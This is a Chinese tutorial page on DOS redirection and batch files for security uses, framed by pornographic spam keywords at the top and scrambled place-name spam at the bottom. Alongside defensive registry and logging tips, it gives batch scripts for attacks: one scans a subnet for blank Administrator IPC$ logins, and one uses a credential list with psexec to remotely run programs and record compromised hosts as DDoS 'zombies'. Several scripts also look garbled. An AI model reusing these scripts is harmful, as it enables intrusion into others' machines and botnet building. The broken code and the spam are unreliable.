最新国产好看的视频,伊人天堂AV在线,国产Aaaaaa视频,蜜臀视频在线观看一区,人妻av色图,密臀久久久精品影片,青青视频免费观看毛片,久草在线观看视,国产三级精品色情在线

DOS的重定向命令使用方法以及在安全方面的應(yīng)用

 更新時(shí)間:2018年12月03日 16:16:56   作者:ChinaITLab  
大家知道,DOS下有一個(gè)不為大家所常用的命令——重定向命令,這個(gè)小東西非常有用,靈活的使用這個(gè)命令可以給我們帶來(lái)很大的方便——無(wú)論是入侵還是防守抑或是系統(tǒng)應(yīng)用,都會(huì)帶來(lái)很大的便利,今天就讓 我們來(lái)看幾個(gè)重定向命令在安全方面的應(yīng)用實(shí)例

大家知道,DOS下有一個(gè)不為大家所常用的命令——重定向命令,這個(gè)小東西非常有用,該命令同樣可以用于 Win9x/ME/2000/XP下,靈活的使用這個(gè)命令可以給我們帶來(lái)很大的方便——無(wú)論是入侵還是防守抑或是系統(tǒng)應(yīng)用,都會(huì)帶來(lái)很大的便利。今天就讓 我們來(lái)看幾個(gè)重定向命令在安全方面的應(yīng)用實(shí)例。

一、命令格式

DOS的標(biāo)準(zhǔn)輸入輸出通常是在標(biāo)準(zhǔn)設(shè)備鍵盤和顯示器上進(jìn)行的,利用重定向,可以方便地將輸入輸出改向磁盤文件或其它設(shè)備。其中:

(1).大于號(hào)“>”將命令發(fā)送到文件或設(shè)備,例如打印機(jī)>prn。使用大于號(hào)“>”時(shí),有些命令輸出(例如錯(cuò)誤消息)不能重定向。

(2).雙大于號(hào)“>>”將命令輸出添加到文件結(jié)尾而不刪除文件中已有的信息。

(3).小于號(hào)“<”從文件而不是鍵盤上獲取命令所需的輸入。

(4).>&符號(hào)將輸出從一個(gè)默認(rèn)I/O流(stdout,stdin,stderr)重新定向到另一個(gè)默認(rèn)I/O流。

例如,command >output_file 2>&1將處理command過(guò)程中的所有錯(cuò)誤信息從屏幕重定向到標(biāo)準(zhǔn)文件輸出中。標(biāo)準(zhǔn)輸出的數(shù)值如下所示:

標(biāo)準(zhǔn)輸出 等價(jià)的數(shù)值

Stdin 0
Stdout 1
Stderr 2

其中,(1)和(2)都創(chuàng)建一個(gè)文件用于存放數(shù)據(jù);(4)可能不能夠在DOS下使用。

二、重定向命令的輸出

幾乎所有的命令均將輸出發(fā)送到屏幕。即使是將輸出發(fā)送到驅(qū)動(dòng)器或打印機(jī)的命令,也會(huì)在屏幕上顯示消息和提示。要將輸出從屏幕重定向到文件或打印機(jī),請(qǐng)使 用大于號(hào)(>)。大多數(shù)命令中均可以使用大于號(hào)。例如,在以下命令中,dir命令生成的目錄列表重定向到Dirlist.txt文件: dir>dirlist.txt,如果Dirlist.txt文件不存在,系統(tǒng)將創(chuàng)建該文件。如果Dirlist.txt存在,系統(tǒng)將使用dir命 令的輸出替換文件中的信息。

要將命令輸出添加到文件結(jié)尾而不丟失文件中的任何信息,請(qǐng)使用雙大于號(hào)(>>)。例如, 在以下命令中,dir命令生成的目錄列表附加到Dirlist.txt文件中:dir>dirlist.txt,將輸入重定向到一個(gè)命令,就象可以 將命令輸出發(fā)送到文件或打印機(jī)而不是屏幕一樣,您可以從文件而不是從鍵盤獲取命令的輸入。要從文件獲取輸入,請(qǐng)使用小于號(hào)(<)。例如,以下命令將 從List.txt文件中獲取sort命令的輸入:sort

三、應(yīng)用舉例

1.給注冊(cè)表加鎖/解鎖

大家知道,注冊(cè)表HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVerssion\ Policies\System分支下的DWORD值“Disableregistrytools”的鍵值如為“1”,則可以給注冊(cè)表加鎖,這樣別人就無(wú) 法使用注冊(cè)表編輯器。利用重定向命令在DOS下就可以給注冊(cè)表加鎖/解鎖,非常方便。

打開記事本程序,新建一個(gè)文本文件,輸入如下內(nèi)容:

@echo REGEDIT4>>123.reg
@echo.>>123.reg
@echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]>>123.reg
@echo "DisableRegistryTools"=dword:00000001>>123.reg
@REGEDIT /S /C 123.reg
@deltree /y 123.reg

另存為以.bat為擴(kuò)展名的批處理文件,點(diǎn)擊這個(gè)文件注冊(cè)表就會(huì)被鎖定!

在上面的命令中,echo是DOS下的回顯命令,在它的前面加上“@”前綴字符,表示執(zhí)行時(shí)本行在命令行或DOS里面不顯示,如果想看到程序執(zhí)行過(guò)程, 請(qǐng)將“@”去掉。大家在編寫上述代碼時(shí)要注意的是,第一行中的“REGEDIT4”一定要用大寫字母,在第二行中“echo”和“.”之間沒(méi)有空格。 “>>”產(chǎn)生的內(nèi)容將追加到它后面的文件中。在文件的最后一行加上deltree /y 123.reg,就可以無(wú)需確認(rèn)就刪除123.reg文件。

要想給注冊(cè)表解鎖,可以編輯這個(gè)批處理文件,只需將 "DisableRegistryTools"=dword:00000001改為"DisableRegistryTools"=dword: 00000000,其他內(nèi)容不變,保存為.bat文件,點(diǎn)擊就可以給注冊(cè)表解鎖了。

2.把登陸3389的機(jī)器IP記錄下來(lái)

把下面的內(nèi)容保存為3389IP.bat:

time /t >>log.log
netstat -n -p tcp |find ":3389">>Log.log
start Explorer

運(yùn)行3389IP.bat,然后查看log.log文件即可看到登陸3389的機(jī)器IP,是不是很方便呢?

3.恢復(fù)DOS實(shí)模式

大家知道,某些惡意網(wǎng)頁(yè)會(huì)修改瀏覽者的注冊(cè)表,在無(wú)所不用其極的各種手段中,修改注冊(cè)表使DOS實(shí)模式不可用是其中的招數(shù)之一。要想恢復(fù)DOS實(shí)模式方法有很多,用批處理和重定向命令結(jié)合使用,是比較特別的一招,在此與大家分享。

echo off
echo REGEDIT4>c:\scanreg.reg
@echo.>>lock.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]>>c:\scanreg.reg
echo "NoRealMode"=dword:00000000>>c:\scanreg.reg
regedit /s c:\scanreg.reg
@del c:\scanreg.reg

另存為以.bat為擴(kuò)展名的批處理文件,點(diǎn)擊這個(gè)文件就可以恢復(fù)DOS實(shí)模式,那些DOS應(yīng)用程序又可以使用了。

4.等待肉雞上門

每天費(fèi)時(shí)費(fèi)力的找肉雞是不是很辛苦,利用重定向命令和批處理文件就可以讓你簡(jiǎn)單的找到肉雞!方法是用記事本新建一個(gè)文本文件,輸入如下內(nèi)容:

@echo off
:start
nc -vv -w 5 -l -p 80>>rouji.log
goto start

保存為.bat文件(事先得準(zhǔn)備好一個(gè)nc.exe文件,它是網(wǎng)絡(luò)故障事件檢測(cè)軟件Netcat的主程序),然后運(yùn)行此程序之后,你就等著肉雞上門主動(dòng)來(lái)找你吧!運(yùn)氣好的話,每天10個(gè)不成問(wèn)題。

5.快速進(jìn)行空連接

空連接是在沒(méi)有信任的情況下與服務(wù)器建立的會(huì)話,換句話說(shuō),它是一個(gè)到服務(wù)器的匿名訪問(wèn)。使用命令net use \\IP\ipc""/user:""就可以簡(jiǎn)單地和目標(biāo)建立一個(gè)空連接(需要目標(biāo)開放IPC)。利用重定向命令和for命令就可以對(duì)一個(gè)C類網(wǎng)段進(jìn)行快速的空連接,并把結(jié)果保存到一個(gè)文件 中供你分析。方法是用記事本編輯如下內(nèi)容的文件:

@echo off
echo 格式:test *.*.*>test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%Gipc""/use:"Administrator"|find"命令完成">>test.txt

批處理文件保存為.bat,運(yùn)行即可。這個(gè)批處理文件的功能是對(duì)你指定的一個(gè)C類網(wǎng)段中的254個(gè)ip依次試建立帳號(hào)為administrator口令為空的ipc連接,如果成功就把結(jié)果記錄在test.txt。這樣就實(shí)現(xiàn)了NT弱口令掃描功能!其中,for命令的功能是對(duì)一組文件中的每一個(gè)文件執(zhí)行 某個(gè)特定命令,也就是可以用你指定的循環(huán)范圍生成一系列命令。For命令的格式為:FOR %variable IN (set) DO command [command-parameters],具體的含義:

%variable:指定一個(gè)單一字母可替換的參數(shù)。

(set):指定一個(gè)或一組文件。可以使用通配符。

command:指定對(duì)每個(gè)文件執(zhí)行的命令。

command-parameters:為特定命令指定參數(shù)或命令行開關(guān)。

在批處理文件中使用FOR命令時(shí),指定變量請(qǐng)使用%%variable而不要用%variable。變量名稱是區(qū)分大小寫的,所以%i不同%I。

6.禁止空連接

空連接的存在對(duì)有一定的危險(xiǎn),所以我們還是禁止它為好!方法是輸入net share察看本地共享資源,接下來(lái)輸入如下命令刪除共享:

net share ipc/deletenetshareadmin /delete
net share c/deletenetshared /delete(如果有e,f等盤符可以同法刪除)

然后用記事本新建一個(gè)文本文件,輸入如下內(nèi)容即可:

@echo REGEDIT4>>123.reg
@echo.>>123.reg
@echo [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA]>>123.reg
@echo "RestrictAnonymous"=dword:00000001>>123.reg
@REGEDIT /S /C 123.reg
@deltree /y 123.reg

另存為以.bat為擴(kuò)展名的批處理文件,點(diǎn)擊這個(gè)文件就可以禁止空連接。

7.掃描所有和本機(jī)以TCP協(xié)議連接的計(jì)算機(jī)

掃描自己的計(jì)算機(jī)端口,發(fā)現(xiàn)有特殊端口打開,可以查木馬,不僅如此,利用下面這個(gè)批處理文件還可以把所有和本機(jī)以TCP協(xié)議連接的計(jì)算機(jī)IP地址都記錄下來(lái)。這個(gè).bat文件內(nèi)容如下:

data /t>>123.log
time /t>>123.log
netstat -n -p tcp 10>>123.log

這樣不僅可以記錄下對(duì)方的IP,還有時(shí)間和日期,方便自己查看。

8.自動(dòng)獲取DDoS肉雞

DDoS是Distributed Denial of Service的縮寫,意即分布式拒絕服務(wù)攻擊。它是指借助于客戶/服務(wù)器技術(shù),將多個(gè)計(jì)算機(jī)聯(lián)合起來(lái)作為攻擊平臺(tái),對(duì)一個(gè)或多個(gè)目標(biāo)發(fā)動(dòng)DoS攻擊,從 而成倍地提高拒絕服務(wù)攻擊的威力。通常,攻擊者使用一個(gè)偷竊帳號(hào)將DDoS主控程序安裝在一個(gè)計(jì)算機(jī)上,在一個(gè)設(shè)定的時(shí)間主控程序?qū)⑴c大量代理程序通訊, 代理程序已經(jīng)被安裝在Internet上的許多計(jì)算機(jī)上。代理程序收到指令時(shí)就發(fā)動(dòng)攻擊。利用客戶/服務(wù)器技術(shù),主控程序能在幾秒鐘內(nèi)激活成百上千次代理 程序的運(yùn)行。

雖然不建議大家使用DDoS方式攻擊,但作為技術(shù)掌握還是很有必要的??墒?,如何才能獲取進(jìn)行DDoS攻擊的肉雞呢?把下面的內(nèi)容保存為ok.bat文件就可以達(dá)到目的了:

@echo off
echo自動(dòng)獲取DDoS肉雞
for /f "tokens=1,3*" %i in (host.txt) do net use \\%k\ipc/user:"\sysytem32
if errorelevel 0 goto success
psexec -d \\%i c:\winnt\system32\%1
net user \\%i\ipc$ /del
:success
echo ------------------------------>>success.txt
echo 肉雞:%i>>success.txt
echo 用戶名:%j>>success.txt
echo 密碼:%k>>success.txt
echo ------------------------------>>success.txt

使用方法是ok.bat *.exe host.txt,其中host.txt的格式為:ip administrator password。好了,快試試吧。但不要用來(lái)干破壞哦。

其實(shí),本文所說(shuō)的方法主要是利用了批處理和相關(guān)的命令,重定向命令在其中只是個(gè)“傳接劑”,起連接作用,但它的功勞也是不小的,所以我們不要忘了重定向命令哦。本文只是拋磚引玉,希望大家暢所欲言,多多指點(diǎn)。在寫作時(shí)參閱過(guò)眾多高手的論壇帖子,多謝各位。

相關(guān)文章

  • 批處理自動(dòng)安裝Mysql與Redis的實(shí)現(xiàn)示例

    批處理自動(dòng)安裝Mysql與Redis的實(shí)現(xiàn)示例

    本文主要介紹了批處理自動(dòng)安裝Mysql與Redis的實(shí)現(xiàn)示例,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2023-06-06
  • Reg命令使用詳解 批處理操作注冊(cè)表必備

    Reg命令使用詳解 批處理操作注冊(cè)表必備

    首先要說(shuō)明:編輯注冊(cè)表不當(dāng)可能會(huì)嚴(yán)重?fù)p壞您的系統(tǒng)。在更改注冊(cè)表之前,應(yīng)備份計(jì)算機(jī)上任何有價(jià)值的數(shù)據(jù)
    2012-04-04
  • 批處理 API實(shí)現(xiàn)文件下載的代碼

    批處理 API實(shí)現(xiàn)文件下載的代碼

    這篇文檔講述的并不是什么新鮮的技術(shù),我只是起到將他們混和起來(lái)實(shí)現(xiàn)了自己需要的功能的作用,如果你對(duì)批處理和PE格式相當(dāng)了解,那我的這篇文檔就權(quán)且當(dāng)作瀏覽溫習(xí)吧...^_^... 
    2008-08-08
  • 批處理重命名系列案例代碼

    批處理重命名系列案例代碼

    這篇文章主要介紹了批處理重命名系列案例代碼,需要的朋友可以參考下
    2020-09-09
  • 批處理刪除自身的命令小結(jié)

    批處理刪除自身的命令小結(jié)

    今天在使用批處理的時(shí)候,需要?jiǎng)h除自身,但因?yàn)槟夸泦?wèn)題等原因不能完整的解決的方法。
    2011-12-12
  • 字符串截取功能批處理

    字符串截取功能批處理

    幫助新手們更好的理解變量字符截取功能.
    2009-05-05
  • systeminfo 系統(tǒng)命令快速查看你的系統(tǒng)幾歲了

    systeminfo 系統(tǒng)命令快速查看你的系統(tǒng)幾歲了

    Windows系統(tǒng)安裝使用到現(xiàn)在,想知道它的“高齡”是多少嗎?
    2008-03-03
  • CMD查殺端口的兩種方式

    CMD查殺端口的兩種方式

    本文主要介紹了CMD查殺端口的兩種方式,端口占有對(duì)于初學(xué)程序的小伙伴們來(lái)說(shuō)是比較痛苦的,只能關(guān)掉項(xiàng)目殺掉端口,但是總有意外,那么我們?cè)趺吹娜ナ褂肅MD查殺正在運(yùn)行的端口呢?感興趣的就一起來(lái)了解一下
    2022-07-07
  • Windows批處理(cmd/bat)常用命令匯總

    Windows批處理(cmd/bat)常用命令匯總

    批處理就是對(duì)某對(duì)象進(jìn)行批量的處理,批處理文件的擴(kuò)展名為bat,編寫批處理文件非常簡(jiǎn)單,但難點(diǎn)在于確保一切按順序執(zhí)行,這篇文章主要介紹了Windows批處理(cmd/bat)常用命令匯總,需要的朋友可以參考下
    2023-08-08
  • Windows?Bat實(shí)現(xiàn)延時(shí)功能的幾種常見方式小結(jié)

    Windows?Bat實(shí)現(xiàn)延時(shí)功能的幾種常見方式小結(jié)

    本文主要介紹了Windows?Bat實(shí)現(xiàn)延時(shí)功能的幾種常見方式小結(jié),包括ping命令,timeout命令,choice命令,for循環(huán),sleep命令及VBScript.sleep命令這六種方法,具有一定的參考價(jià)值,感興趣的可以了解一下
    2024-02-02

最新評(píng)論

凤凰县| 应用必备| 华蓥市| 双峰县| 金溪县| 柞水县| 黎城县| 通辽市| 彰化市| 山东省| 石城县| 突泉县| 石景山区| 彩票| 嘉义市| 连平县| 潜江市| 卢氏县| 安仁县| 古丈县| 嘉善县| 榆社县| 嘉鱼县| 太和县| 同德县| 辽阳县| 年辖:市辖区| 芷江| 茂名市| 三门峡市| 南靖县| 绵阳市| 玉龙| 宁阳县| 施秉县| 隆尧县| 巴林左旗| 广宁县| 兴海县| 肇东市| 绥宁县|